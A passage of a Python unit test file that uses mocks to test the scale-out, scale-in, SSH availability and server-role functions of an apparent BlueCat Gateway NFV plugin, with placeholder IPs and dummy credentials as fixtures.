@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_none_server_cap_profile(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": None,
"dns_view_names": "view",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = None
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_dns_view(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server, mock_add_server,
mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": None,
"dns_view_names": "aaa",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = None
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_successfully(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_deploy_server_config,
mock_wait_for_deployment, mock_process_password, mock_memcached_nfv, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "aaa",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": True,
"dns_view_names": "view",
"server_deploy_role": "server",
"anycast_config": True,
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": 11211,
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_id = 334498
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_add_server.return_value = server_id
role_id = 111
mock_create_deployment_roles.return_value = role_id
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = True
mock_wait_for_deployment.return_value = deploy_status
mem_nfv = []
mock_memcached_nfv.return_value = mem_nfv
jsonify = {"status": "Successful", "message": "Scale out successfully", "error": ""}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
def test_scale_in_with_not_config_id(self, mock_get_configuration_id, mock_jsonify):
# pylint: disable=missing-docstring
config_id = None
data = ""
mock_get_configuration_id.return_value = config_id
jsonify = {"status": "Failed",
"message": "Configuration id not found!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
actual = scale_in(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
mock_get_configuration_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_remove_roles_false(self, mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
mock_delete_server_roles.return_value = remove_roles
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
with self.assertRaises(Exception):
actual = scale_in(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_with_default_interface_address_not_correct_position(self, mock_get_server_by_name, mock_delete_server_roles,
mock_deploy_server_config, mock_wait_for_deployment, mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
server['properties'].split('|')[0].split('=')[0] = "nhiii"
mock_delete_server_roles.return_value = remove_roles
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
with self.assertRaises(Exception):
actual = scale_in(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_with_deploy_server_false(self, mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
server['properties'].split('|')[0].split('=')[0] = "nhiii"
mock_delete_server_roles.return_value = remove_roles
deploy_server = False
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
with self.assertRaises(Exception):
actual = scale_in(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_in_failed_with_delete_server_false(self, mock_read_config_json_file, mock_get_configuration_id,
mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
server['properties'].split('|')[0].split('=')[0] = "nhiii"
mock_delete_server_roles.return_value = remove_roles
deploy_server = False
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = False
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
with self.assertRaises(Exception):
actual = scale_in(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password.decrypt_password')
def test_stop_anycast_services_true(self, mock_decrypt_password, mock_run_ssh_command, mock_g):
# pylint: disable=missing-docstring
mock_decrypt_password.return_value = "d8e8fca"
mock_run_ssh_command.return_value = b'retcode=ok', None
server_id = 334498
username = "root"
pwd = "d8e8fca"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import stop_anycast_service # pylint:disable=import-error
stop_anycast_service(server_id, username, pwd)
mock_g.user.logger.debug.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password.decrypt_password')
def test_stop_anycast_services_false(self, mock_decrypt_password, mock_run_ssh_command, mock_g):
# pylint: disable=missing-docstring
mock_decrypt_password.return_value = "d8e8fca"
mock_run_ssh_command.return_value = b'retcode=nhii', b'error'
server_id = 334498
username = "root"
pwd = "d8e8fca"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import stop_anycast_service # pylint:disable=import-error
stop_anycast_service(server_id, username, pwd)
self.assertEqual(mock_g.user.logger.error.call_count, 2)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_by_name(self, mock_g):
# pylint: disable=missing-docstring
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
config_id = 102728
server_name = "bdds169"
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_by_name # pylint:disable=import-error
actual = get_server_by_name(config_id, server_name)
expected = server
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getEntityByName.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.BAMException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_by_name_with_exception(self, mock_g):
# pylint: disable=missing-docstring
config_id = 102728
server_name = "bdds169"
mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_by_name # pylint:disable=import-error
with self.assertRaises(Exception):
get_server_by_name(config_id, server_name)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_roles')
def test_delete_server_roles_with_delete_entity_true(self, mock_get_server_roles, mock_delete_entity):
# pylint: disable=missing-docstring
roles = [335958, 335957]
mock_get_server_roles.return_value = roles
server_id = "334498"
mock_delete_entity.return_value = True
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_server_roles # pylint:disable=import-error
actual = delete_server_roles(server_id)
expected = True
self.assertEqual(expected, actual)
mock_get_server_roles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_roles')
def test_delete_server_roles_with_delete_entity_false(self, mock_get_server_roles, mock_delete_entity):
# pylint: disable=missing-docstring
roles = [335958, 335957]
mock_get_server_roles.return_value = roles
server_id = "334498"
mock_delete_entity.return_value = False
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_server_roles # pylint:disable=import-error
actual = delete_server_roles(server_id)
expected = False
self.assertEqual(expected, actual)
mock_get_server_roles.assert_called_once_with(server_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_roles(self, mock_g):
# pylint: disable=missing-docstring
server_id = "334498"
roles = [
{
"id": 335958,
"entityId": 160080,
"serverInterfaceId": 332455,
"type": "NONE",
"service": "DHCP",
"properties": "readOnly=false|secondaryServerInterfaceId=334499|"
},
{
"id": 335957,
"entityId": 160080,
"serverInterfaceId": 332455,
"type": "NONE",
"service": "DHCP",
"properties": "readOnly=false|secondaryServerInterfaceId=334499|"
}]
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.return_value = roles
roles_id = [335958, 335957]
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_roles # pylint:disable=import-error
actual = get_server_roles(server_id)
expected = roles_id
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_roles_none(self, mock_g):
# pylint: disable=missing-docstring
server_id = "334498"
mock_g.user.logger.warning.side_effect = Exception("exception")
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.side_effect = Exception(
"exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_roles # pylint:disable=import-error
with self.assertRaises(Exception) as context:
actual = get_server_roles(server_id)
expect = []
self.assertEqual(actual, expect)
self.assertTrue("exception" in str(context.exception))
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_delete_entity_true(self, mock_g):
# pylint: disable=missing-docstring
entity_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_entity # pylint:disable=import-error
actual = delete_entity(entity_id)
expected = True
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.delete.assert_called_once_with(
entity_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_delete_entity_false(self, mock_g):
# pylint: disable=missing-docstring
entity_id = "334498"
mock_g.user.get_api.return_value._api_client.service.delete.side_effect = Exception("exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_entity # pylint:disable=import-error
with self.assertRaises(Exception) as context:
delete_entity(entity_id)
self.assertTrue('except' in str(context.exception))
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.paramiko')
def test_is_check_available_server_with_true(self, mock_paramiko, mock_process_password):
# pylint: disable=missing-docstring
ssh = mock.Mock()
mock_paramiko.SSHClient.return_value = ssh
pwd_decrypt = "d8e8fca"
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
mock_process_password.decrypt_password.return_value = pwd_decrypt
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import is_check_available_server # pylint:disable=import-error
actual = is_check_available_server(server_ip, username, password)
expected = True
self.assertEqual(actual, expected)
mock_process_password.decrypt_password.assert_called_once_with(
password)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.NoValidConnectionsError', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.paramiko')
def test_is_check_available_server_with_false(self, mock_paramiko, mock_process_password):
# pylint: disable=missing-docstring
ssh = mock.Mock()
mock_paramiko.SSHClient.return_value = ssh
pwd_decrypt = None
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
mock_process_password.decrypt_password.return_value = pwd_decrypt
ssh.connect.side_effect = OSError('exception'), Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import is_check_available_server # pylint:disable=import-error
actual = is_check_available_server(server_ip, username, password)
expect = False
self.assertEqual(actual, expect)
mock_process_password.decrypt_password.assert_called_once_with(
password)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.return_value = server_id
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
actual = add_server(server_ip, server_name,
config_id, profile, properties)
expected = server_id
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server_with_portal_exception(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.side_effect = Exception(
"exception")
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
with self.assertRaises(Exception) as context:
add_server(server_ip, server_name,
config_id, profile, properties)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server_with_webdefault_exception(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.side_effect = Exception(
"exception")
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
with self.assertRaises(Exception) as context:
add_server(server_ip, server_name,
config_id, profile, properties)
self.assertTrue('except' in str(context.exception))
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_false(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value.get_entity_by_id.side_effect = Exception(
"exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.logger.warning.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
with self.assertRaises(Exception):
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expect = False
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_server_id_none(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = None
server_obj = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_obj
server_nsf = {
"id": 111
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_nsf
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
role_id = None
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = role_id
